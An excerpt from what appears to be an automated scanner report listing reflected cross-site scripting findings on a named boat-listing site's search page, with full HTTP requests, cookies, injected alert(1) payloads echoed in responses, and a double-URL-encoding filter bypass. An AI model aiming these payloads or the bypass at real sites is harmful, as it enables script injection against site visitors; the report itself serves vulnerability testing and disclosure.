D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:33 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 94417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
AS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004cfcea';alert(1)//f3edb3a3b4f&minpr=0&minl=24&maxl=32';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_
...[SNIP]...

3.376. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [ftid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the ftid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16fdc"%3balert(1)//0752cca2e was submitted in the ftid parameter. This input was echoed as 16fdc";alert(1)//0752cca2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cint=100&fromYear=2004&Ntk=boatsEN&searchtype=homepage&hmid=0&sm=3&enid=0&currencyid=100&toLength=32&cit=true&luom=126&boatsAddedSelected=-1&fromLength=24&fromPrice=0&ftid=016fdc"%3balert(1)//0752cca2e&man=regulator&slim=quick&is=false&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.24.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.9.10.1296155835; s_pers=%20s_nr%3D1296156327130%7C1298748327130%3B%20s_lv%3D1296156327132%7C1390764327132%3B%20s_lv_s%3DFirst%2520Visit%7C1296158127132%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253Fcint%2525253D100%25252526fromYear%2525253D2004%25252526Ntk%2525253DboatsEN%25252526se%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:51 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
rase entered"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">2004"
s.prop10="no search phrase entered"
s.prop11="no search phrase entered"
s.prop12="016fdc";alert(1)//0752cca2e"
s.prop13="no search phrase entered"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="United States"
s.prop18="no search phrase ent
...[SNIP]...

3.377. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [hmid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the hmid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1436c"%3balert(1)//652196e7185 was submitted in the hmid parameter. This input was echoed as 1436c";alert(1)//652196e7185 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cint=100&fromYear=2004&Ntk=boatsEN&searchtype=homepage&hmid=01436c"%3balert(1)//652196e7185&sm=3&enid=0&currencyid=100&toLength=32&cit=true&luom=126&boatsAddedSelected=-1&fromLength=24&fromPrice=0&ftid=0&man=regulator&slim=quick&is=false&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.24.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.9.10.1296155835; s_pers=%20s_nr%3D1296156327130%7C1298748327130%3B%20s_lv%3D1296156327132%7C1390764327132%3B%20s_lv_s%3DFirst%2520Visit%7C1296158127132%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253Fcint%2525253D100%25252526fromYear%2525253D2004%25252526Ntk%2525253DboatsEN%25252526se%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:51 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator"
s.prop6="Used"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">2004"
s.prop10="no search phrase entered"
s.prop11="01436c";alert(1)//652196e7185"
s.prop12="no search phrase entered"
s.prop13="no search phrase entered"
s.prop14="no search phrase entered"
s.prop15="no search phrase entered"
s.prop16="no search phrase entered"
s.prop17="United St
...[SNIP]...

3.378. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [is parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the is request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11668"%3balert(1)//9b29a752fbc was submitted in the is parameter. This input was echoed as 11668";alert(1)//9b29a752fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false11668"%3balert(1)//9b29a752fbc&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:25 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator"
s.prop6="false11668";alert(1)//9b29a752fbc"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.379. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [is parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the is request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 374af"%3balert(1)//0b9e70a6aecda86b1 was submitted in the is parameter. This input was echoed as 374af";alert(1)//0b9e70a6aecda86b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false374af"%3balert(1)//0b9e70a6aecda86b1&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:41 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator"
s.prop6="false374af";alert(1)//0b9e70a6aecda86b1"
s.prop7="no search phrase entered"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.380. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [luom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the luom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ec3%2522%253balert%25281%2529%252f%252f49ee2de717e was submitted in the luom parameter. This input was echoed as b0ec3";alert(1)//49ee2de717e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the luom request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

